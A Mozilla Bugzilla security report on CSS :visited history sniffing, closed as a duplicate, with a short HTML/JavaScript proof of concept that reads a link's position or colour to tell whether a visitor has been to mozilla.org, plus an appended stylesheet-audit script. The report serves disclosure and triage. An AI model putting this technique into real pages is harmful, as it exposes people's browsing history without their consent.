Closed
Bug 127041
Opened 24 years ago
Closed 24 years ago
possible to check if a site has been visited
Categories
(Core :: Security, defect)
People
(Reporter: bugzilla, Assigned: security-bugs)
I'm not sure if this is a bug or not, but I found this on Bugtraq.
1) Clear Mozilla browser history
2) visit http://gemal.dk/browserspy/css-moz.html
3) visit http://mozilla.org
4) visit http://gemal.dk/browserspy/css-moz.html
the page can tell if you visited http://mozilla.org
done via style sheet and visited
Comment 1 • 24 years ago (Reporter)
the URL is now:
http://gemal.dk/browserspy/css.html
Comment 2 • 24 years ago
<div class="normal">
<a id="j" href="http://mozilla.org/"> </a>
<style>
#j { position: absolute; top: 0; }
#j:visited { top: 100px; color: #660001; }
</style>
<script>
var j=document.getElementById('j');
var v=0;
// Layout check: the :visited rule moves the link to top: 100px
if (j && 'offsetTop' in j)
  if (j.offsetTop == 100)
    v=1;
// Style check: currentStyle exposes the colour set by the :visited rule
if (j && 'currentStyle' in j && 'color' in j.currentStyle)
  if (j.currentStyle.color == '#660001')
    v=1;
if (v)
  document.writeln('You have been visiting mozilla.org lately! That very good! Now clear your browsers history and reload!');
else
  document.writeln('You haven\'t been visiting mozilla.org lately. Go ahead <a href="http://mozilla.org/">mozilla.org</a> and then come back...');
</script>
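An added example, not part of the bug report or of Mozilla's code: a small stylesheet audit that finds `:visited` rules like the one in comment 2 and separates declarations that change layout (observable through `offsetTop`) from colour declarations (observable through `currentStyle`). The function name `findVisitedRules`, the `COLOR_PROPS` list and the regex-based rule splitting are assumptions made for this example, and the sample CSS is constructed from comment 2.

```javascript
// Constructed sample: the stylesheet from comment 2 plus one unrelated rule.
const SAMPLE_CSS = `
#j { position: absolute; top: 0; }
#j:visited { top: 100px; color: #660001; }
a:hover { color: red; }
`;

// Assumption: properties treated as colour-only; anything else can shift layout.
const COLOR_PROPS = new Set(['color', 'background-color', 'border-color', 'outline-color']);

// Hypothetical helper: return one finding per rule that has a :visited selector.
function findVisitedRules(css) {
  const text = css.replace(/\/\*[\s\S]*?\*\//g, ''); // drop CSS comments
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g;             // innermost "selector { decls }"
  const findings = [];
  let m;
  while ((m = ruleRe.exec(text)) !== null) {
    // Keep only the selectors in this rule that depend on visited state.
    const selectors = m[1].split(',').map(s => s.trim())
      .filter(s => /:visited\b/i.test(s));
    if (selectors.length === 0) continue;
    // Property names of every declaration in the rule body.
    const props = m[2].split(';')
      .map(d => d.split(':')[0].trim().toLowerCase())
      .filter(Boolean);
    findings.push({
      selectors,
      layout: props.filter(p => !COLOR_PROPS.has(p)), // readable via geometry
      color: props.filter(p => COLOR_PROPS.has(p)),   // readable via style lookup
    });
  }
  return findings;
}

for (const f of findVisitedRules(SAMPLE_CSS)) {
  console.log(f.selectors.join(', '), 'layout:', f.layout, 'color:', f.color);
}
```

The regex split handles flat rules and rules nested one level inside an at-rule block; it does not parse strings or escapes in selectors.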
Comment 3 • 24 years ago (Assignee)
Essentially the same issue as 57351, which is still assigned to me but I may
WONTFIX it. I just can't think of a way to solve it without getting rid of the
"visited" rule in CSS. Henrik, can you give us a link to the Bugtraq post?
In any case, the information leakage involved here is pretty limited. *please*
give me your thoughts on the severity of this problem.
*** This bug has been marked as a duplicate of 57351 ***
Status: NEW → RESOLVED
Closed: 24 years ago
Resolution: --- → DUPLICATE